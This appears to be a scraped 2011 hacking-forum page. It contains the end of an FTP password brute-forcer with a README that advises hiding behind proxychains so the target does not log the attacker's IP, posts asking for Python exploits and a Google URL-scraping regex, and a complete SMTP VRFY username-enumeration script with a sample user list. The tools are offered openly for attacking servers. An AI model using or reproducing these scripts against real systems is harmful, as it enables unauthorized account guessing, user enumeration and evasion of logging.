    print(\"Could not find your wordlist file. Exiting...\")
    sys.exit()
    
check = raw_input(\"Check for anonymous login?[Y/n]\")
if check == 'Y':
    isanon(host)
    for word in curwords:
        bruteme(word.replace(\"\n\",\"\"), user)
else:
    print(\"Attacking %s\" % host)
    for word in curwords:
        bruteme(word.replace(\"\n\",\"\"), user)

README:

FTPeeNuke is an FTP bruteforcer written in Python by chroniccommand.

Please note that you should use proxychains with this as the server will log your IP for every login attempt.

http://poison.teamxpc.com/
http://iexploit.org/
http://team-xpc.com/
http://haxme.org/

Greets to x3n0n, Xinapse, Semtex-Primed and every other member I <3

Python exploits

Zero-One — Thu, 09 Jun 2011 22:40:24 -0400

Hello everyone!
I've just started with Python programming language, and in 10 hours, I have figured it out and I have selected it as my second best programming language (after C).
Anyway, has anybody got some exploits written in Python?
I really need to now how do they look like (for my education of writing my own).
Well, that would be all.
Thank you!

Anyone know the Regex to extract URLS from Google search?

Xin — Sat, 28 May 2011 19:37:24 -0400

I have \w+\.[\w\.\-/]*\.\w+'

but all it does it extract the website url rather than the full address.

eg google.com

rather than google.com/&s=t3ji5ya5

Need help with smtp user brute script

m0rph — Sun, 15 May 2011 14:38:15 -0400


#!/usr/bin/python

#Unauthenticated VRFY Username Brute Force
#written by m0rph
#www.iexploit.org
#15MAY2011

import socket, sys

#If no input

if len(sys.argv) != 3:
     print \"Usage: vrfybrute.py <target IP> <user list>\"
     sys.exit(0)

#Function for connecting, reading from file, and guessing username from file

def brute() :

     target = str(sys.argv[1]) #Define target's IP
     count = 0

     try :
          dict = open(sys.argv[2], \"rb\") #Define User List
          buffer = dict.read().splitlines()
     except :
          print \"\n\t[-]Sorry, cannot open file\"
     try :
          while True :
               user = buffer[count] #Defines user as the current username in the buffer
               s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
               connect=s.connect((target, 25))
               banner=s.recv(1024)
               print banner
               s.send('VRFY ' + user + '\r\n') #Send VRFY command with user
               result=s.recv(1024)
               print result
               s.close()
               count=count+1  #Set count to next user in list
          else :
               print \"\n\t[-]Could not connect to server.\"
               sys.exit(0)
     except :
          print \"\n\t[-]End of user list.\"
          sys.exit(0)

while True :
     brute()

Sorry about the false alarm everyone, I solved all the issues I was having.

This script will take a user list and brute force them with an SMTP server through the VRFY command.

In otherwords, it's an ok way to enumerate users on an smtp server, should you find one that you don't have to authenticate with to use VRFY on.

Sample layout of a user list compatible with this:


root
bob
jane
jeff
alice
billy

Cheers guys